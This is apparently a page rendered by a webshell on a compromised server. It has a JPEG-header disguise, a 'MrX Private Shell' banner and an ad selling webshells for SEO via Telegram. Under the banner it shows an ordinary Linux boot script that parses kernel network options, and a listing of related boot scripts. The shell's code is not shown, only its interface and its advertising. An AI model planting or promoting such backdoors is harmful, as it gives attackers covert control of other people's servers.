����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# purpose of 20-check-boot-options.sh is to find out if at boot time
# we entered special boot options, such as:
# dhcp to force DHCLIENT to be started instead of the network scripts
# ip=10.10.10.10 was defined to force an IPADDR of our choice instead
# of the original IP address of the source system (useful for cloning purposes)
# nm=255.255.255.0 to set the netmask (may be skipped)
read -r </proc/cmdline
echo $REPLY | grep -q dhcp && USE_DHCLIENT=y
echo $REPLY | grep -q "ip="
if [ $? -eq 0 ]; then
IPADDR=${REPLY#*ip=}
IPADDR=${IPADDR%% *}
echo "IP address will be overruled by kernel option ip=$IPADDR"
fi
echo $REPLY | grep -q "nm="
if [ $? -eq 0 ]; then
NETMASK=${REPLY#*nm=}
NETMASK=${NETMASK%% *}
fi
echo $REPLY | grep -q "gw="
if [ $? -eq 0 ]; then
GATEWAY=${REPLY#*gw=}
GATEWAY=${GATEWAY%% *}
fi
echo $REPLY | grep -q "netdev="
if [ $? -eq 0 ]; then
NETDEV=${REPLY#*netdev=}
NETDEV=${NETDEV%% *}
fi
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 00-functions.sh | File | 1.1 KB | 0644 |
|
| 01-run-ldconfig.sh | File | 140 B | 0644 |
|
| 10-console-setup.sh | File | 2.21 KB | 0644 |
|
| 20-check-boot-options.sh | File | 930 B | 0644 |
|
| 40-start-udev-or-load-modules.sh | File | 3.45 KB | 0644 |
|
| 41-load-special-modules.sh | File | 1.32 KB | 0644 |
|
| 42-engage-scsi.sh | File | 254 B | 0644 |
|
| 45-serial-console.sh | File | 779 B | 0644 |
|
| 55-migrate-network-devices.sh | File | 14.33 KB | 0644 |
|
| 58-start-dhclient.sh | File | 1.82 KB | 0644 |
|
| 65-sysctl.sh | File | 149 B | 0644 |
|
| 99-makedev.sh | File | 401 B | 0644 |
|